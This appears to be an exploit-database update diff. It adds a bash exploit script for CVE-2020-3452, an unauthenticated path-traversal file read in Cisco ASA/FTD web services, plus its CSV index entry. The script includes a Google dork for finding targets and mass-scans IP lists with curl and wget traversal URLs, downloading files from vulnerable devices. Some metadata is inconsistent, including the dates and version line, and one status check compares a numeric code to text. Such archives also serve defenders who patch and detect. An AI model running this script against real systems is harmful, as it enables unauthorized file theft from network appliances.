DB: 2020-07-29

1 changes to exploits/shellcodes

Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion

exploits/hardware/webapps/48722.txt

@@ -0,0 +1,96 @@
+# Exploit Title: Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion
+# Google Dork: inurl:/+CSCOE+/
+# Date: 2020-08-27
+# Exploit Author:  0xmmnbassel
+# Vendor Homepage: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
+# Version: Cisco ASA Software  >=9.14 except 9.11   Cisco FTD Software >=6.2.2 and 6.2.3,6.3.0,6.4.0,6.50,6.60
+# Vulnerability Type: unauthenticated file read
+# CVE: CVE-2020-3452
+
+
+#!/bin/bash
+
+
+read="%2bCSCOE%2b/portal_inc.lua"
+
+
+helpFunction()
+{
+   echo ""
+   echo -e "\t\tCVE-2020-3452"
+   echo ""
+   echo "Usage: $0 -l targets.txt -r %2bCSCOE%2b/portal_inc.lua "
+   echo -e "\t-l for list of IPs in text file"
+   echo -e "\t-r file to read, default: %2bCSCOE%2b/portal_inc.lua"
+   echo -e "\t-i for single IP test"
+   exit 1
+}
+
+while getopts "l:r:i:" opt
+do
+   case "$opt" in
+      l ) input="$OPTARG" ;;
+      r ) read="$OPTARG" ;;
+      i ) website="$OPTARG" ;;
+      ? ) helpFunction ;;
+   esac
+done
+
+
+
+#if $website is empty or $input is empty
+if [  -z "$website"  ] && [ -z "$input" ]
+then
+   echo "Some/all of the parameters are empty";
+   helpFunction
+fi
+
+#usage
+
+
+if [ -z "$website"];
+  then
+  while IFS= read -r line
+  do
+    name=$(echo $line | cut -c9-19)
+    #echo "testing $line"
+    filename="$name.txt"
+      #echo $response
+      status=$(curl -LI  $line"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name="$read  -o /dev/null   -w '%{http_code}\n' -s)
+
+      if [ $status -eq "400" ]; then
+        echo "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!"
+      else
+        wget  "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read" -O $name.txt
+
+        if [ -s $filename ]; then
+          echo "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read..."
+            echo "downloaded!, $line is vulnerable to CVE-2020-3452."
+
+        else
+          echo "not vulnerable!"
+          rm -rf $filename
+        fi
+      fi
+    done < "$input"
+  else
+
+  name=$(echo $website | cut -c9-16)
+  filename="$name.txt"
+
+  status=$(curl -LI  $website"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name="$read  -o /dev/null   -w '%{http_code}\n' -s)
+  if [ $status -eq "Bad Request" ]; then
+    echo "$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!"
+  else
+
+    echo "$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read..."
+    wget  "$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read" -O $name.txt
+    if [ -s $filename ]; then
+      echo "downloaded!, $website is vulnerable to CVE-2020-3452."
+    else
+      echo "not vulnerable!"
+      rm -rf $filename
+    fi
+  fi
+
+fi

files_exploits.csv

@@ -42964,3 +42964,4 @@ id,file,description,date,author,type,platform,port
 48715,exploits/php/webapps/48715.txt,"Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting",2020-07-26,"Peter Blue",webapps,php,
 48716,exploits/ruby/webapps/48716.rb,"Rails 5.0.1 - Remote Code Execution",2020-07-26,"Lucas Amorim",webapps,ruby,
 48720,exploits/php/webapps/48720.py,"eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution",2020-07-27,"Berk KIRAS",webapps,php,
+48722,exploits/hardware/webapps/48722.txt,"Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion",2020-07-28,0xmmnbassel,webapps,hardware,